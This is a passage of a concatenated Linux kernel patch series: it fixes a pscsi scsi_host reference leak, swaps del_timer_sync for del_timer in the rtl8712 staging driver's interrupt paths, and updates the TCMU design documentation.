MLX5_CMD_STAT_BAD_RES_ERR = 0x5, + MLX5_CMD_STAT_RES_BUSY = 0x6, + MLX5_CMD_STAT_LIM_ERR = 0x8, + MLX5_CMD_STAT_BAD_RES_STATE_ERR = 0x9, + MLX5_CMD_STAT_IX_ERR = 0xa, + MLX5_CMD_STAT_NO_RES_ERR = 0xf, + MLX5_CMD_STAT_BAD_INP_LEN_ERR = 0x50, + MLX5_CMD_STAT_BAD_OUTP_LEN_ERR = 0x51, + MLX5_CMD_STAT_BAD_QP_STATE_ERR = 0x10, + MLX5_CMD_STAT_BAD_PKT_ERR = 0x30, + MLX5_CMD_STAT_BAD_SIZE_OUTS_CQES_ERR = 0x40, +}; + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 51738472657e..7fa26f03acc1 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -489,6 +489,7 @@ struct mlx5_core_dev { struct mlx5_priv priv; struct mlx5_profile *profile; atomic_t num_qps; + u32 issi; }; struct mlx5_db { From 5a7125c64def3b21f8147eca8b54949a60963942 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Fri, 22 May 2015 14:07:44 -0700 Subject: [PATCH 503/872] target/pscsi: Don't leak scsi_host if hba is VIRTUAL_HOST See https://bugzilla.redhat.com/show_bug.cgi?id=1025672 We need to put() the reference to the scsi host that we got in pscsi_configure_device(). In VIRTUAL_HOST mode it is associated with the dev_virt, not the hba_virt. Signed-off-by: Andy Grover Cc: stable@vger.kernel.org # 2.6.38+ Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_pscsi.c | 3 +++ drivers/target/target_core_pscsi.h | 1 + 2 files changed, 4 insertions(+) diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c index f6c954c4635f..4073869d2090 100644 --- a/drivers/target/target_core_pscsi.c +++ b/drivers/target/target_core_pscsi.c @@ -521,6 +521,7 @@ static int pscsi_configure_device(struct se_device *dev) " pdv_host_id: %d\n", pdv->pdv_host_id); return -EINVAL; } + pdv->pdv_lld_host = sh; } } else { if (phv->phv_mode == PHV_VIRTUAL_HOST_ID) { @@ -603,6 +604,8 @@ static void pscsi_free_device(struct se_device *dev) if ((phv->phv_mode == PHV_LLD_SCSI_HOST_NO) && (phv->phv_lld_host != NULL)) scsi_host_put(phv->phv_lld_host); + else if (pdv->pdv_lld_host) + scsi_host_put(pdv->pdv_lld_host); if ((sd->type == TYPE_DISK) || (sd->type == TYPE_ROM)) scsi_device_put(sd); diff --git a/drivers/target/target_core_pscsi.h b/drivers/target/target_core_pscsi.h index 1bd757dff8ee..820d3052b775 100644 --- a/drivers/target/target_core_pscsi.h +++ b/drivers/target/target_core_pscsi.h @@ -45,6 +45,7 @@ struct pscsi_dev_virt { int pdv_lun_id; struct block_device *pdv_bd; struct scsi_device *pdv_sd; + struct Scsi_Host *pdv_lld_host; } ____cacheline_aligned; typedef enum phv_modes { From 39a6e7376af08b4caabf57ae21335bd31f003073 Mon Sep 17 00:00:00 2001 From: Sudip Mukherjee Date: Fri, 15 May 2015 14:49:39 +0530 Subject: [PATCH 504/872] staging: rtl8712: fix stack dump del_timer_sync() is not to be called in the interrupt context unless the timer is irqsafe. but most of the functions where commits 6501c8e7d86cca5f and 382d020f4459cd77 touched were called in interrupt context. And as a result the WARN_ON was getting triggered. Changed to del_timer() in places which were called from interrupt. Fixes: 382d020f4459cd77 ("Staging: rtl8712: Eliminate use of _cancel_timer" Fixes: 6501c8e7d86cca5f ("Staging: rtl8712: Eliminate use of _cancel_timer_ex") Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=97711 Reported-by: Arek Rusniak Tested-by: Arek Rusniak Signed-off-by: Sudip Mukherjee Signed-off-by: Greg Kroah-Hartman --- drivers/staging/rtl8712/rtl8712_led.c | 144 +++++++++++----------- drivers/staging/rtl8712/rtl871x_cmd.c | 2 +- drivers/staging/rtl8712/rtl871x_mlme.c | 6 +- drivers/staging/rtl8712/rtl871x_pwrctrl.c | 2 +- drivers/staging/rtl8712/rtl871x_sta_mgt.c | 2 +- 5 files changed, 78 insertions(+), 78 deletions(-) diff --git a/drivers/staging/rtl8712/rtl8712_led.c b/drivers/staging/rtl8712/rtl8712_led.c index f1d47a0676c3..ada8d5dafd49 100644 --- a/drivers/staging/rtl8712/rtl8712_led.c +++ b/drivers/staging/rtl8712/rtl8712_led.c @@ -898,11 +898,11 @@ static void SwLedControlMode1(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -921,11 +921,11 @@ static void SwLedControlMode1(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedLinkBlinkInProgress = true; @@ -946,15 +946,15 @@ static void SwLedControlMode1(struct _adapter *padapter, if (IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -975,11 +975,11 @@ static void SwLedControlMode1(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } pLed->bLedBlinkInProgress = true; @@ -998,19 +998,19 @@ static void SwLedControlMode1(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1025,23 +1025,23 @@ static void SwLedControlMode1(struct _adapter *padapter, break; case LED_CTL_STOP_WPS: if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); else pLed->bLedWPSBlinkInProgress = true; pLed->CurrLedState = LED_BLINK_WPS_STOP; @@ -1057,7 +1057,7 @@ static void SwLedControlMode1(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1073,23 +1073,23 @@ static void SwLedControlMode1(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedNoLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1116,7 +1116,7 @@ static void SwLedControlMode2(struct _adapter *padapter, return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1154,11 +1154,11 @@ static void SwLedControlMode2(struct _adapter *padapter, pLed->CurrLedState = LED_ON; pLed->BlinkingLedState = LED_ON; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } @@ -1170,11 +1170,11 @@ static void SwLedControlMode2(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1214,15 +1214,15 @@ static void SwLedControlMode2(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1248,7 +1248,7 @@ static void SwLedControlMode3(struct _adapter *padapter, if (IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1286,11 +1286,11 @@ static void SwLedControlMode3(struct _adapter *padapter, pLed->CurrLedState = LED_ON; pLed->BlinkingLedState = LED_ON; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1300,11 +1300,11 @@ static void SwLedControlMode3(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1319,7 +1319,7 @@ static void SwLedControlMode3(struct _adapter *padapter, break; case LED_CTL_STOP_WPS: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&(pLed->BlinkTimer)); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } else pLed->bLedWPSBlinkInProgress = true; @@ -1336,7 +1336,7 @@ static void SwLedControlMode3(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->CurrLedState = LED_OFF; @@ -1357,15 +1357,15 @@ static void SwLedControlMode3(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1388,7 +1388,7 @@ static void SwLedControlMode4(struct _adapter *padapter, case LED_CTL_START_TO_LINK: if (pLed1->bLedWPSBlinkInProgress) { pLed1->bLedWPSBlinkInProgress = false; - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); pLed1->BlinkingLedState = LED_OFF; pLed1->CurrLedState = LED_OFF; if (pLed1->bLedOn) @@ -1400,11 +1400,11 @@ static void SwLedControlMode4(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } pLed->bLedStartToLinkBlinkInProgress = true; @@ -1426,7 +1426,7 @@ static void SwLedControlMode4(struct _adapter *padapter, if (LedAction == LED_CTL_LINK) { if (pLed1->bLedWPSBlinkInProgress) { pLed1->bLedWPSBlinkInProgress = false; - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); pLed1->BlinkingLedState = LED_OFF; pLed1->CurrLedState = LED_OFF; if (pLed1->bLedOn) @@ -1439,7 +1439,7 @@ static void SwLedControlMode4(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1460,11 +1460,11 @@ static void SwLedControlMode4(struct _adapter *padapter, if (IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1485,7 +1485,7 @@ static void SwLedControlMode4(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } pLed->bLedBlinkInProgress = true; @@ -1503,7 +1503,7 @@ static void SwLedControlMode4(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed1->bLedWPSBlinkInProgress) { pLed1->bLedWPSBlinkInProgress = false; - del_timer_sync(&(pLed1->BlinkTimer)); + del_timer(&pLed1->BlinkTimer); pLed1->BlinkingLedState = LED_OFF; pLed1->CurrLedState = LED_OFF; if (pLed1->bLedOn) @@ -1512,15 +1512,15 @@ static void SwLedControlMode4(struct _adapter *padapter, } if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1538,7 +1538,7 @@ static void SwLedControlMode4(struct _adapter *padapter, break; case LED_CTL_STOP_WPS: /*WPS connect success*/ if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1552,7 +1552,7 @@ static void SwLedControlMode4(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL: /*WPS authentication fail*/ if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1565,7 +1565,7 @@ static void SwLedControlMode4(struct _adapter *padapter, msecs_to_jiffies(LED_BLINK_NO_LINK_INTERVAL_ALPHA)); /*LED1 settings*/ if (pLed1->bLedWPSBlinkInProgress) - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); else pLed1->bLedWPSBlinkInProgress = true; pLed1->CurrLedState = LED_BLINK_WPS_STOP; @@ -1578,7 +1578,7 @@ static void SwLedControlMode4(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL_OVERLAP: /*WPS session overlap*/ if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1591,7 +1591,7 @@ static void SwLedControlMode4(struct _adapter *padapter, msecs_to_jiffies(LED_BLINK_NO_LINK_INTERVAL_ALPHA)); /*LED1 settings*/ if (pLed1->bLedWPSBlinkInProgress) - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); else pLed1->bLedWPSBlinkInProgress = true; pLed1->CurrLedState = LED_BLINK_WPS_STOP_OVERLAP; @@ -1607,31 +1607,31 @@ static void SwLedControlMode4(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedNoLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedStartToLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedStartToLinkBlinkInProgress = false; } if (pLed1->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); pLed1->bLedWPSBlinkInProgress = false; } pLed1->BlinkingLedState = LED_UNKNOWN; @@ -1671,7 +1671,7 @@ static void SwLedControlMode5(struct _adapter *padapter, ; /* dummy branch */ else if (pLed->bLedScanBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1705,7 +1705,7 @@ static void SwLedControlMode5(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } SwLedOff(padapter, pLed); @@ -1756,7 +1756,7 @@ static void SwLedControlMode6(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1772,7 +1772,7 @@ static void SwLedControlMode6(struct _adapter *padapter, case LED_CTL_STOP_WPS_FAIL: case LED_CTL_STOP_WPS: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->CurrLedState = LED_ON; @@ -1784,11 +1784,11 @@ static void SwLedControlMode6(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } SwLedOff(padapter, pLed); diff --git a/drivers/staging/rtl8712/rtl871x_cmd.c b/drivers/staging/rtl8712/rtl871x_cmd.c index 1a1c38f885d6..e35854d28f90 100644 --- a/drivers/staging/rtl8712/rtl871x_cmd.c +++ b/drivers/staging/rtl8712/rtl871x_cmd.c @@ -910,7 +910,7 @@ void r8712_createbss_cmd_callback(struct _adapter *padapter, if (pcmd->res != H2C_SUCCESS) mod_timer(&pmlmepriv->assoc_timer, jiffies + msecs_to_jiffies(1)); - del_timer_sync(&pmlmepriv->assoc_timer); + del_timer(&pmlmepriv->assoc_timer); #ifdef __BIG_ENDIAN /* endian_convert */ pnetwork->Length = le32_to_cpu(pnetwork->Length); diff --git a/drivers/staging/rtl8712/rtl871x_mlme.c b/drivers/staging/rtl8712/rtl871x_mlme.c index fb2b195b90af..c044b0e55ba9 100644 --- a/drivers/staging/rtl8712/rtl871x_mlme.c +++ b/drivers/staging/rtl8712/rtl871x_mlme.c @@ -582,7 +582,7 @@ void r8712_surveydone_event_callback(struct _adapter *adapter, u8 *pbuf) spin_lock_irqsave(&pmlmepriv->lock, irqL); if (check_fwstate(pmlmepriv, _FW_UNDER_SURVEY) == true) { - del_timer_sync(&pmlmepriv->scan_to_timer); + del_timer(&pmlmepriv->scan_to_timer); _clr_fwstate_(pmlmepriv, _FW_UNDER_SURVEY); } @@ -696,7 +696,7 @@ void r8712_ind_disconnect(struct _adapter *padapter) } if (padapter->pwrctrlpriv.pwr_mode != padapter->registrypriv.power_mgnt) { - del_timer_sync(&pmlmepriv->dhcp_timer); + del_timer(&pmlmepriv->dhcp_timer); r8712_set_ps_mode(padapter, padapter->registrypriv.power_mgnt, padapter->registrypriv.smart_ps); } @@ -910,7 +910,7 @@ void r8712_joinbss_event_callback(struct _adapter *adapter, u8 *pbuf) if (check_fwstate(pmlmepriv, WIFI_STATION_STATE) == true) r8712_indicate_connect(adapter); - del_timer_sync(&pmlmepriv->assoc_timer); + del_timer(&pmlmepriv->assoc_timer); } else goto ignore_joinbss_callback; } else { diff --git a/drivers/staging/rtl8712/rtl871x_pwrctrl.c b/drivers/staging/rtl8712/rtl871x_pwrctrl.c index aaa584435c87..9bc04f474d18 100644 --- a/drivers/staging/rtl8712/rtl871x_pwrctrl.c +++ b/drivers/staging/rtl8712/rtl871x_pwrctrl.c @@ -103,7 +103,7 @@ void r8712_cpwm_int_hdl(struct _adapter *padapter, if (pwrpriv->cpwm_tog == ((preportpwrstate->state) & 0x80)) return; - del_timer_sync(&padapter->pwrctrlpriv.rpwm_check_timer); + del_timer(&padapter->pwrctrlpriv.rpwm_check_timer); _enter_pwrlock(&pwrpriv->lock); pwrpriv->cpwm = (preportpwrstate->state) & 0xf; if (pwrpriv->cpwm >= PS_STATE_S2) { diff --git a/drivers/staging/rtl8712/rtl871x_sta_mgt.c b/drivers/staging/rtl8712/rtl871x_sta_mgt.c index 7bb96c47f188..a9b93d0f6f56 100644 --- a/drivers/staging/rtl8712/rtl871x_sta_mgt.c +++ b/drivers/staging/rtl8712/rtl871x_sta_mgt.c @@ -198,7 +198,7 @@ void r8712_free_stainfo(struct _adapter *padapter, struct sta_info *psta) * cancel reordering_ctrl_timer */ for (i = 0; i < 16; i++) { preorder_ctrl = &psta->recvreorder_ctrl[i]; - del_timer_sync(&preorder_ctrl->reordering_ctrl_timer); + del_timer(&preorder_ctrl->reordering_ctrl_timer); } spin_lock(&(pfree_sta_queue->lock)); /* insert into free_sta_queue; 20061114 */ From cf87edc6022d1fe7efa6b8ce1a99f2ef6a1b27f9 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:38 -0700 Subject: [PATCH 505/872] target/user: Update example code for new ABI requirements We now require that the userspace handler set a bit if the command is not handled. Update calls to tcmu_hdr_get_op for v2. Signed-off-by: Andy Grover Reviewed-by: Ilias Tsitsimpis Signed-off-by: Nicholas Bellinger --- Documentation/target/tcmu-design.txt | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/Documentation/target/tcmu-design.txt b/Documentation/target/tcmu-design.txt index c80bf1ed8981..b495108c433c 100644 --- a/Documentation/target/tcmu-design.txt +++ b/Documentation/target/tcmu-design.txt @@ -324,7 +324,7 @@ int handle_device_events(int fd, void *map) /* Process events from cmd ring until we catch up with cmd_head */ while (ent != (void *)mb + mb->cmdr_off + mb->cmd_head) { - if (tcmu_hdr_get_op(&ent->hdr) == TCMU_OP_CMD) { + if (tcmu_hdr_get_op(ent->hdr.len_op) == TCMU_OP_CMD) { uint8_t *cdb = (void *)mb + ent->req.cdb_off; bool success = true; @@ -339,8 +339,12 @@ int handle_device_events(int fd, void *map) ent->rsp.scsi_status = SCSI_CHECK_CONDITION; } } + else if (tcmu_hdr_get_op(ent->hdr.len_op) != TCMU_OP_PAD) { + /* Tell the kernel we didn't handle unknown opcodes */ + ent->hdr.uflags |= TCMU_UFLAG_UNKNOWN_OP; + } else { - /* Do nothing for PAD entries */ + /* Do nothing for PAD entries except update cmd_tail */ } /* update cmd_tail */ From 9c1cd1b68cd15c81d12a0cf2402129475882b620 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:39 -0700 Subject: [PATCH 506/872] target/user: Only support full command pass-through After much discussion, give up on only passing a subset of SCSI commands to userspace and pass them all. Based on what pscsi is doing, make sure to set SCF_SCSI_DATA_CDB for I/O ops, and define attributes identical to pscsi. Make hw_block_size configurable via dev param. Remove mention of command filtering from tcmu-design.txt. Signed-off-by: Andy Grover Reviewed-by: Ilias Tsitsimpis Signed-off-by: Nicholas Bellinger --- Documentation/target/tcmu-design.txt | 21 +---- drivers/target/target_core_user.c | 124 ++++++++++++++++----------- 2 files changed, 75 insertions(+), 70 deletions(-) diff --git a/Documentation/target/tcmu-design.txt b/Documentation/target/tcmu-design.txt index b495108c433c..263b907517ac 100644 --- a/Documentation/target/tcmu-design.txt +++ b/Documentation/target/tcmu-design.txt @@ -15,8 +15,7 @@ Contents: a) Discovering and configuring TCMU uio devices b) Waiting for events on the device(s) c) Managing the command ring -3) Command filtering -4) A final note +3) A final note TCM Userspace Design @@ -364,24 +363,6 @@ int handle_device_events(int fd, void *map) } -Command filtering ------------------ - -Initial TCMU support is for a filtered commandset. Only IO-related 